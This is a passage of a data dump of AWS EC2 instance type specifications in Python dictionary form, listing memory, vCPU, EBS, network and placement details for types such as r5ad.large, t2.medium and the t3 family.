'MemoryInfo': {'SizeInMiB': 16384}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 650, 'BaselineThroughputInMBps': 81.25, 'BaselineIops': 3600, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 16384, 'TotalSizeInGB': 75, 'Disks': [{'SizeInGB': 75, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 650, 'BaselineThroughputInMBps': 81.25, 'BaselineIops': 3600, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 
'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r5ad.large', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 16384}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 75, 'Disks': [{'SizeInGB': 75, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 650, 'BaselineThroughputInMBps': 81.25, 'BaselineIops': 3600, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 
2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 16384, 'TotalSizeInGB': 75, 'Disks': [{'SizeInGB': 75, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 650, 'BaselineThroughputInMBps': 81.25, 'BaselineIops': 3600, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r5d.large', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 16384}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 75, 'Disks': [{'SizeInGB': 75, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 650, 'BaselineThroughputInMBps': 81.25, 'BaselineIops': 3600, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 
'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.3, 'DefaultVCpus': 2, 'DefaultCores': 2, 'DefaultThreadsPerCore': 1, 'SizeInMiB': 8192, 'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'supported', 'NvmeSupport': 'unsupported', 'NetworkPerformance': 'Low to Moderate', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Low to Moderate', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 12, 'Ipv6AddressesPerInterface': 12, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 't2.large', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.3}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 2, 'DefaultThreadsPerCore': 1}, 'MemoryInfo': {'SizeInMiB': 8192}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'supported', 'NvmeSupport': 'unsupported'}, 'NetworkInfo': 
{'NetworkPerformance': 'Low to Moderate', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Low to Moderate', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 12, 'Ipv6AddressesPerInterface': 12, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': True, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['i386', 'x86_64'], 'SustainedClockSpeedInGhz': 2.3, 'DefaultVCpus': 2, 'DefaultCores': 2, 'DefaultThreadsPerCore': 1, 'SizeInMiB': 4096, 'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'supported', 'NvmeSupport': 'unsupported', 'NetworkPerformance': 'Low to Moderate', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Low to Moderate', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 6, 'Ipv6AddressesPerInterface': 6, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 't2.medium', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['i386', 'x86_64'], 'SustainedClockSpeedInGhz': 2.3}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 2, 'DefaultThreadsPerCore': 1}, 'MemoryInfo': {'SizeInMiB': 4096}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'supported', 
'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'Low to Moderate', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Low to Moderate', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 6, 'Ipv6AddressesPerInterface': 6, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': True, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 8192, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 695, 'BaselineThroughputInMBps': 86.875, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 2780, 'MaximumThroughputInMBps': 347.5, 'MaximumIops': 15700}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 12, 'Ipv6AddressesPerInterface': 12, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 't3.large', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 
'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 8192}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 695, 'BaselineThroughputInMBps': 86.875, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 2780, 'MaximumThroughputInMBps': 347.5, 'MaximumIops': 15700}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 12, 'Ipv6AddressesPerInterface': 12, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': True, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 4096, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 347, 'BaselineThroughputInMBps': 43.375, 'BaselineIops': 2000, 'MaximumBandwidthInMbps': 2085, 'MaximumThroughputInMBps': 260.625, 'MaximumIops': 11800}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 3}], 
'Ipv4AddressesPerInterface': 6, 'Ipv6AddressesPerInterface': 6, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 't3.medium', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 4096}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 347, 'BaselineThroughputInMBps': 43.375, 'BaselineIops': 2000, 'MaximumBandwidthInMbps': 2085, 'MaximumThroughputInMBps': 260.625, 'MaximumIops': 11800}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 6, 'Ipv6AddressesPerInterface': 6, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': True, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 1024, 'EbsOptimizedSupport': 
'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 87, 'BaselineThroughputInMBps': 10.875, 'BaselineIops': 500, 'MaximumBandwidthInMbps': 2085, 'MaximumThroughputInMBps': 260.625, 'MaximumIops': 11800}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 2, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 2}], 'Ipv4AddressesPerInterface': 2, 'Ipv6AddressesPerInterface': 2, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 't3.micro', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 1024}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 87, 'BaselineThroughputInMBps': 10.875, 'BaselineIops': 500, 'MaximumBandwidthInMbps': 2085, 'MaximumThroughputInMBps': 260.625, 'MaximumIops': 11800}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 2, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 2}], 'Ipv4AddressesPerInterface': 2, 'Ipv6AddressesPerInterface': 2, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 
'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': True, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 512, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 43, 'BaselineThroughputInMBps': 5.375, 'BaselineIops': 250, 'MaximumBandwidthInMbps': 2085, 'MaximumThroughputInMBps': 260.625, 'MaximumIops': 11800}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 2, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 2}], 'Ipv4AddressesPerInterface': 2, 'Ipv6AddressesPerInterface': 2, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 't3.nano', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 512}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 43, 'BaselineThroughputInMBps': 5.375, 'BaselineIops': 250, 
'MaximumBandwidthInMbps': 2085, 'MaximumThroughputInMBps': 260.625, 'MaximumIops': 11800}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 2, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 2}], 'Ipv4AddressesPerInterface': 2, 'Ipv6AddressesPerInterface': 2, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': True, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 2048, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 174, 'BaselineThroughputInMBps': 21.75, 'BaselineIops': 1000, 'MaximumBandwidthInMbps': 2085, 'MaximumThroughputInMBps': 260.625, 'MaximumIops': 11800}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 4, 'Ipv6AddressesPerInterface': 4, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 't3.small', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': 
False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 2048}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 174, 'BaselineThroughputInMBps': 21.75, 'BaselineIops': 1000, 'MaximumBandwidthInMbps': 2085, 'MaximumThroughputInMBps': 260.625, 'MaximumIops': 11800}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 4, 'Ipv6AddressesPerInterface': 4, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': True, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 8192, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 695, 'BaselineThroughputInMBps': 86.875, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 2780, 'MaximumThroughputInMBps': 347.5, 'MaximumIops': 15700}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 
'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 12, 'Ipv6AddressesPerInterface': 12, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 't3a.large', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 8192}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 695, 'BaselineThroughputInMBps': 86.875, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 2780, 'MaximumThroughputInMBps': 347.5, 'MaximumIops': 15700}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 12, 'Ipv6AddressesPerInterface': 12, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': True, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 
